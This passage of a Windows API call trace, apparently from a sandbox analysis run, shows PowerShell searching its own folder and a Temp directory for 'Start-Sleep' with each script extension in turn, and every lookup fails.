(dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x3a [0176.459] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0176.459] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.459] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.460] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.461] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x3a [0176.461] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0176.461] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.461] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.463] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.463] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x3a [0176.464] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0176.464] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.464] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.465] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.466] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x3a [0176.466] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0176.466] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.466] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.467] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.467] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", lpFilePart=0x0) returned 0x39 [0176.468] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0176.468] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.468] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.475] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.476] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x3a [0176.476] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0176.476] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.476] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.498] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x3a [0176.498] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0176.499] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.499] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.499] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x3a [0176.500] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0176.500] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.500] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.501] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x3a [0176.502] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0176.502] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.502] GetLongPathNameW (in: 